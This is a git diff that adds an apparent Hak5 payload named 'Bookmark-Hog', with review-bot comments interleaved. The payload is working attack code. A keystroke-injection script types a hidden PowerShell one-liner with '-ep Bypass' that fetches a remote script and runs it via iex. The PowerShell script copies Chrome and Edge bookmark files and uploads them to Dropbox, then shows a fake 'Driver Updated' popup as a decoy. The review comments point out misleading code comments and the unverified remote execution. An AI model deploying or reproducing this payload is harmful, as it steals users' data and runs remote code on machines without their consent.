diff --git a/payloads/library/exfiltration/Bookmark-Hog/BH.ps1 b/payloads/library/exfiltration/Bookmark-Hog/BH.ps1
new file mode 100644
index 0000000..5b8f1cd
--- /dev/null
+++ b/payloads/library/exfiltration/Bookmark-Hog/BH.ps1
@@ -0,0 +1,63 @@
+#Bookmark-Hog
+
+# See if file is a thing
+Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf
+
+#If the file does not exist, write to host.
+if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
+ try {
+ Write-Host "The chrome bookmark file has not been found. "
+ }
+ catch {
+ throw $_.Exception.Message
+ }
+ }
+ # Copy Chrome Bookmarks to Bash Bunny
+ else {
+ $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt"
+ Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$env:tmp/$F1"
+ }
+
+# See if file is a thing
+Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf
+
+#If the file does not exist, write to host.
+if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
+ try {
+ Write-Host "The edge bookmark file has not been found. 
"
+ }
+ catch {
+ throw $_.Exception.Message
+ }
+}
+ # Copy Chrome Bookmarks to Bash Bunny
+ else {
+ $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt"
+ Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$env:tmp/$F2"
+}
+
+function DropBox-Upload {
+
+ [CmdletBinding()]
+ param (
+
+ [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
+ [Alias("f")]
+ [string]$SourceFilePath
+ )
+ $DropBoxAccessToken = "YOUR ACCESS TOKEN" # Replace with your DropBox Access Token
+ $outputFile = Split-Path $SourceFilePath -leaf
+ $TargetFilePath="/$outputFile"
+ $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
+ $authorization = "Bearer " + $DropBoxAccessToken
+ $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
+ $headers.Add("Authorization", $authorization)
+ $headers.Add("Dropbox-API-Arg", $arg)
+ $headers.Add("Content-Type", 'application/octet-stream')
+ Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
+ }
+
+DropBox-Upload -f "$env:tmp/$F1"
+DropBox-Upload -f "$env:tmp/$F2"
+
+$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
diff --git a/payloads/library/exfiltration/Bookmark-Hog/README.md b/payloads/library/exfiltration/Bookmark-Hog/README.md
new file mode 100644
index 0000000..4e8ac03
--- /dev/null
+++ b/payloads/library/exfiltration/Bookmark-Hog/README.md
@@ -0,0 +1,109 @@ + +
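Review bot: The comment `# Copy Chrome Bookmarks to Bash Bunny` sits above both `else` branches, but the second branch copies the Edge file, and in both cases the destination shown is `$env:tmp`, not the device. The later `DropBox-Upload` calls then send those copies to `content.dropboxapi.com`, so the comments understate where the data ends up; something like `# Copy Edge bookmarks to $env:tmp (uploaded to Dropbox below)` would match the code. I would also add a short header comment listing what the script leaves behind: the two `<user>-<date>_*_bookmarks.txt` copies in the temp directory and the outbound POST from PowerShell. That lets whoever reviews an authorised test, or triages a host afterwards, match those artefacts to this payload.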

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Bookmark-Hog + +A payload to exfiltrate bookmarks of the 2 most popular browsers + +## Description + +This payload will enumerate through the browser directories, looking for the file that stores the bookmark history +These files will be saved to the temp directory +Finally dropbox will be used to exfiltrate the files to cloud storage + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/payloads/library/exfiltration/Bookmark-Hog/payload.txt b/payloads/library/exfiltration/Bookmark-Hog/payload.txt
new file mode 100644
index 0000000..17ce970
--- /dev/null
+++ b/payloads/library/exfiltration/Bookmark-Hog/payload.txt
@@ -0,0 +1,16 @@
+REM Title: Bookmark-Hog
+
+REM Author: atomiczsec
+
+REM Description: This payload is meant to exfiltrate bookmarks to the rubber ducky
+
+REM Target: Windows 10, 11
+
+DELAY 2000
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
+ENTER
+
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
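Review bot: The `REM Description` line says the bookmarks are exfiltrated "to the rubber ducky", but BH.ps1 in this commit copies them to the temp directory and uploads them to a Dropbox account, so the header misstates where the data goes. I would reword it to `REM Description: Copies Chrome/Edge bookmarks to the temp directory and uploads them to Dropbox`. The `STRING` line also passes whatever the shared link returns at that moment straight to `iex` under `-ep Bypass`, so whoever controls the link decides what runs on the machine. A `REM` stating that the script is fetched and executed without any integrity check would make that risk explicit to anyone reviewing the payload before an authorised test.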